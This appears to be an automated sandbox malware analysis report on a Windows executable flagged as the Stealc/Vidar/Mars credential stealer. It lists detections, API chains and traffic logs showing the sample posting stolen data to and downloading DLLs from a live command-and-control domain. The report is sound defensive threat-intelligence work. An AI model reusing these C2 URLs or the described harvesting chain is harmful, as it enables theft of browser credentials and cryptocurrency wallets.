Windows Analysis Report
pYJeC4VJbw.exe

Overview

General Information

Sample name: pYJeC4VJbw.exe (renamed because original name is a hash value)
Original sample name: 14c3db1bdba407c23f0e80bbfdd6db0f.exe
Analysis ID: 1435882
MD5: 14c3db1bdba407c23f0e80bbfdd6db0f
SHA1: 304c2d438d926f73f58f1ee9635b449b585dddce
SHA256: 596a9e9ed53dbeb50b69a93bfeef67855baf488f3638695b5485fd1c9633fad7
Tags: exe

Detection

Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • pYJeC4VJbw.exe (PID: 6936 cmdline: "C:\Users\user\Desktop\pYJeC4VJbw.exe" MD5: 14C3DB1BDBA407C23F0E80BBFDD6DB0F)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

No configs have been found

Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.2884642591.0000000002C80000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000000.00000002.2884642591.0000000002C80000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_MarsStealer | Yara detected Mars stealer | Joe Security |
00000000.00000002.2884642591.0000000002C80000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.2884797147.0000000002D97000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x1168:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2884177155.0000000002C00000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89

Source | Rule | Description | Author | Strings
0.2.pYJeC4VJbw.exe.2c80e67.2.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.2.pYJeC4VJbw.exe.2c80e67.2.unpack | JoeSecurity_MarsStealer | Yara detected Mars stealer | Joe Security |
0.2.pYJeC4VJbw.exe.2c80e67.2.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.2.pYJeC4VJbw.exe.2c80e67.2.raw.unpack | JoeSecurity_MarsStealer | Yara detected Mars stealer | Joe Security |
0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: https://shaffatta.com/d32e011d2eaa85a0/mozglue.dll | Avira URL Cloud: Label: malware
Source: https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dll | Avira URL Cloud: Label: malware
Source: https://shaffatta.com/d32e011d2eaa85a0/nss3.dll | Avira URL Cloud: Label: malware
Source: https://shaffatta.com/d32e011d2eaa85a0/freebl3.dll | Avira URL Cloud: Label: malware
Source: https://shaffatta.com/d32e011d2eaa85a0/sqlite3.dll | Avira URL Cloud: Label: malware
Source: https://shaffatta.com/d32e011d2eaa85a0/vcruntime140.dll | Avira URL Cloud: Label: malware
Source: https://shaffatta.com/d32e011d2eaa85a0/softokn3.dll | Avira URL Cloud: Label: malware
Source: https://shaffatta.com/D | Virustotal: Detection: 8%
Source: https://shaffatta.com/fdca69ae739b4897.php | Virustotal: Detection: 11%
Source: https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dll | Virustotal: Detection: 11%
Source: https://shaffatta.com/fdca69ae739b4897.php& | Virustotal: Detection: 8%
Source: https://shaffatta.com/5 | Virustotal: Detection: 10%
Source: https://shaffatta.com/d32e011d2eaa85a0/freebl3.dll | Virustotal: Detection: 6%
Source: https://shaffatta.com/fdca69ae739b4897.phpa | Virustotal: Detection: 8%
Source: https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dlll | Virustotal: Detection: 11%
Source: https://shaffatta.com/d32e011d2eaa85a0/vcruntime140.dll | Virustotal: Detection: 6%
Source: pYJeC4VJbw.exe | ReversingLabs: Detection: 65%
Source: pYJeC4VJbw.exe | Virustotal: Detection: 46%
Source: pYJeC4VJbw.exe | Joe Sandbox ML: detected
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: CtIvEWInDoW
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: AgEBOxw
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: ijklmnopqrs
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: /#%33@@@
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: abcdefghijklmnopqrs
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: @@@@<@@@
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: abcdefghijklmnopqrs
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: "&&""..""&&"">>""&&"".."ikSQWQSQ_QBEklmn^pqrBtuvFxyzL123H5679+/|
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: %s\%V/yVs
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: %s\*.
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: }567y9n/S
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: ntTekeny
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: ging
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: PassMord0
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: J@@@`z`@J@@@J@@@
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: OPQRSTUVWXY
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: 456753+/---- '
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: '--- '
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: deh0Q
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: HeapFree
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: GetLocaleInfoA
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: ntProcessId
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: wininet.dll
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: shlwapi.dll
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: shell32.dll
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: .dll
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: column_text
Source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack | String decryptor: login:
Source: C:\Users\user\Desktop\pYJeC4VJbw.exe | Code function: 0_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\pYJeC4VJbw.exe | Code function: 0_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\pYJeC4VJbw.exe | Code function: 0_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\pYJeC4VJbw.exe | Code function: 0_2_004155A0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA
Source: C:\Users\user\Desktop\pYJeC4VJbw.exe | Code function: 0_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat
Source: C:\Users\user\Desktop\pYJeC4VJbw.exe | Code function: 0_2_6CFA6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer
Source: C:\Users\user\Desktop\pYJeC4VJbw.exe | Code function: 0_2_6D0FA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util

Compliance

Source: C:\Users\user\Desktop\pYJeC4VJbw.exe | Unpacked PE file: 0.2.pYJeC4VJbw.exe.400000.0.unpack
Source: pYJeC4VJbw.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\pYJeC4VJbw.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 168.119.248.46:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: pYJeC4VJbw.exe, 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: pYJeC4VJbw.exe, 00000000.00000002.2903802204.000000006D1CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: pYJeC4VJbw.exe, 00000000.00000002.2903802204.000000006D1CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: pYJeC4VJbw.exe, 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\pYJeC4VJbw.exe | Code function: 0_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\pYJeC4VJbw.exe | Code function: 0_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\pYJeC4VJbw.exe | Code function: 0_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\pYJeC4VJbw.exe | Code function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\pYJeC4VJbw.exe | Code function: 0_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\pYJeC4VJbw.exe | Code function: 0_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\pYJeC4VJbw.exe | Code function: 0_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\pYJeC4VJbw.exe | Code function: 0_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\pYJeC4VJbw.exe | Code function: 0_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\pYJeC4VJbw.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\pYJeC4VJbw.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\pYJeC4VJbw.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\pYJeC4VJbw.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\pYJeC4VJbw.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\pYJeC4VJbw.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: global traffic | HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CFIECFIJDAAKEBGCGHIE | Host: shaffatta.com | Content-Length: 216 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GDBKKFHIEGDHJKECAAKK | Host: shaffatta.com | Content-Length: 268 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----BFHDAEHDAKECGCAKFCFI | Host: shaffatta.com | Content-Length: 267 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CBKJEGCBKKJECBGCGDBA | Host: shaffatta.com | Content-Length: 6691 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /d32e011d2eaa85a0/sqlite3.dll HTTP/1.1 | Host: shaffatta.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCA | Host: shaffatta.com | Content-Length: 4599 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IJDBKKJKJEBFBGCBAAFI | Host: shaffatta.com | Content-Length: 1451 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIE | Host: shaffatta.com | Content-Length: 359 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJE | Host: shaffatta.com | Content-Length: 359 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /d32e011d2eaa85a0/freebl3.dll HTTP/1.1 | Host: shaffatta.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /d32e011d2eaa85a0/mozglue.dll HTTP/1.1 | Host: shaffatta.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /d32e011d2eaa85a0/msvcp140.dll HTTP/1.1 | Host: shaffatta.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /d32e011d2eaa85a0/nss3.dll HTTP/1.1 | Host: shaffatta.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /d32e011d2eaa85a0/softokn3.dll HTTP/1.1 | Host: shaffatta.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /d32e011d2eaa85a0/vcruntime140.dll HTTP/1.1 | Host: shaffatta.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJD | Host: shaffatta.com | Content-Length: 1067 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----ECAKECAEGDHIECBGHIII | Host: shaffatta.com | Content-Length: 267 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DHJDAKEGDBFHCAAKJJJD | Host: shaffatta.com | Content-Length: 265 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AFHIEBKKFHIEGCAKECGH | Host: shaffatta.com | Content-Length: 1759 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----KKKEBKJJDGHCBGCAAKEH | Host: shaffatta.com | Content-Length: 1743 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AFHIEBKKFHIEGCAKECGH | Host: shaffatta.com | Content-Length: 1759 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDG | Host: shaffatta.com | Content-Length: 1743 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----ECGDBAEHIJKKFHIEGCBG | Host: shaffatta.com | Content-Length: 1759 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----ECBAEBGHDAECBGDGCAKE | Host: shaffatta.com | Content-Length: 1743 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JJEGCBGIDHCAKEBGIIDB | Host: shaffatta.com | Content-Length: 1759 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JJKFBAKFBGDHIEBGDAKF | Host: shaffatta.com | Content-Length: 1743 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJE | Host: shaffatta.com | Content-Length: 1759 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IJKJJKFHIJKKFHJJECBA | Host: shaffatta.com | Content-Length: 1743 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDB | Host: shaffatta.com | Content-Length: 1759 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFH | Host: shaffatta.com | Content-Length: 1743 | Connection: Keep-Alive | Cache-Control: no-cache
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\pYJeC4VJbw.exe | Code function: 0_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle
Source: global traffic | DNS traffic detected: DNS query: shaffatta.com
Source: unknown | HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CFIECFIJDAAKEBGCGHIE | Host: shaffatta.com | Content-Length: 216 | Connection: Keep-Alive | Cache-Control: no-cache
                  Source: pYJeC4VJbw.exe, pYJeC4VJbw.exe, 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2903413122.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2895334222.000000001D511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                  Source: GIJKKKFC.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: GIJKKKFC.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ep
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.epnacl
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmp, GIJKKKFC.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmp, GIJKKKFC.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: GIJKKKFC.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: GIJKKKFC.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: GIJKKKFC.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://mozilla.org0/
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884824643.0000000002DBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/)
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/1
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/32e011d2eaa85a0/nss3.dll
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/32e011d2eaa85a0/nss3.dllc
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/3r:
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/5
                  Source: pYJeC4VJbw.exe, 00000000.00000003.2526693387.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000003.2526535738.0000000002E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/8s/
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/D
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/GHCGHCBFHJJKKJEHJEHJEH
